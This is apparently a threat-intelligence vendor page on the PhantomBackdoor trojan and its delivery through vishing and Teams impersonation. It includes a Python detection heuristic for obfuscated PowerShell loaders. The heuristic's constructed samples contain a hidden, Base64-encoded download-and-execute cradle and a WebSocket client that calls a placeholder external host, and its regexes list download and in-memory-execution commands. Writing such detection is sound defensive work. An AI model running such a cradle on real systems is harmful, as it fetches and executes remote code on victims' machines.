PhantomBackdoor
PhantomBackdoor is a backdoor/trojan observed in a social-engineering-driven intrusion campaign reported by Cato CTRL Threat Research. In the described activity, attackers used voice phishing (vishing) and Microsoft Teams as part of the delivery chain, including help-desk impersonation, to guide victims into executing PhantomBackdoor. One report specifically describes it as a WebSocket-based trojan delivered via an obfuscated PowerShell script retrieved from an external server. The campaign targeted an Italy-based engineering firm. The available content directly associates PhantomBackdoor with vishing- and Teams-enabled initial access and remote backdoor functionality, but does not provide further confirmed technical details, persistence mechanisms, or indicators of compromise.
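The summary above gives the shape of the delivery (an obfuscated PowerShell script fetched from an external server, followed by a WebSocket-based backdoor) but no indicators. The hunting heuristic below is an added example written for this page; it is not code from Cato CTRL, Mallory, or the PhantomBackdoor report. It decodes PowerShell -EncodedCommand blobs, scores download-cradle, in-memory-execution, hidden-window and WebSocket-client markers in command lines and script-block text, and flags a batch of constructed sample events. The indicator names, weights, alert threshold and every sample event are assumptions for illustration.

```python
"""Hunting heuristic for obfuscated PowerShell loaders and WebSocket-client
script blocks. Indicators, weights and sample telemetry are constructed for
this example and are not taken from any PhantomBackdoor report."""
import base64
import re
from typing import Optional

# Assumption: PowerShell's -EncodedCommand flag family (-e, -ec, -en, -enc,
# -EncodedCommand) carries a Base64 blob of UTF-16LE text.
ENC_FLAG = re.compile(
    r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})"
)

# Weighted indicators; heavier weight for behaviours that are rarely benign.
INDICATORS = {
    "download_cradle": (2, re.compile(
        r"(?i)DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|"
        r"Invoke-RestMethod|\birm\b|Net\.WebClient")),
    "in_memory_exec": (2, re.compile(r"(?i)Invoke-Expression|\bIEX\b")),
    "websocket": (2, re.compile(r"(?i)ClientWebSocket|\bwss?://")),
    "hidden_window": (1, re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")),
    "external_url": (1, re.compile(
        r"(?i)\b(?:https?|wss?)://(?!(?:localhost|127\.|10\.|192\.168\.))")),
}
ALERT_THRESHOLD = 3  # assumed tuning value, not from the report


def decode_encoded_command(text: str) -> Optional[str]:
    """Return the decoded inner script, "" if the flag is present but the blob
    does not decode, or None if no encoded-command flag is present."""
    m = ENC_FLAG.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def analyze(text: str) -> dict:
    """Score one command line or script-block text."""
    decoded = decode_encoded_command(text)
    # Mask the opaque Base64 blob so its characters cannot trip word-boundary
    # matches, then append the decoded inner script for scoring.
    effective = ENC_FLAG.sub(" -enc <blob>", text)
    if decoded is not None:
        effective += "\n" + decoded
    hits, score = [], 0
    for name, (weight, rx) in INDICATORS.items():
        if rx.search(effective):
            hits.append(name)
            score += weight
    if decoded is not None:
        hits.append("encoded_command")
        score += 1
    return {"hits": hits, "score": score,
            "alert": score >= ALERT_THRESHOLD, "decoded": decoded}


def encode_for_powershell(script: str) -> str:
    """Build an -EncodedCommand blob the way PowerShell expects (UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry: three process-creation command lines and one
# script-block text. 203.0.113.10 is a documentation-range placeholder.
SAMPLE_EVENTS = {
    "staged_loader": "powershell.exe -nop -w hidden -enc " + encode_for_powershell(
        "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/update.ps1')"),
    "scheduled_backup": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\nightly-backup.ps1",
    "benign_encoded": "powershell.exe -enc " + encode_for_powershell("Get-Date"),
    "websocket_block": "$ws = New-Object System.Net.WebSockets.ClientWebSocket\n"
                       "$ws.ConnectAsync([Uri]'wss://203.0.113.10/s', $ct).Wait()",
}


def hunt(events: dict) -> dict:
    """Run the heuristic over a batch; returns {event_name: result}."""
    return {name: analyze(text) for name, text in events.items()}


if __name__ == "__main__":
    for name, result in hunt(SAMPLE_EVENTS).items():
        flag = "ALERT" if result["alert"] else "ok   "
        print(f"{flag} {name:<18} score={result['score']} hits={result['hits']}")
```

In practice the inputs would be the CommandLine field of process-creation events (Sysmon Event ID 1 or Windows 4688) and ScriptBlockText from PowerShell script-block logging (Event ID 4104). Encoded commands on their own are common in legitimate management tooling, which is why they carry weight 1 here and the threshold requires at least one heavier behaviour before an alert fires; expect to allow-list known automation and to tune the weights to your environment.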
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Techniques & procedures
5 distinct techniques documented for this family, organized by ATT&CK tactic.
Recent activity
2 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A WebSocket-based trojan/backdoor delivered through a Microsoft Teams help-desk impersonation campaign, executed via an obfuscated PowerShell script retrieved from an external server.
A backdoor delivered via a vishing technique and Microsoft Teams in an attack against an Italy-based engineering firm.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.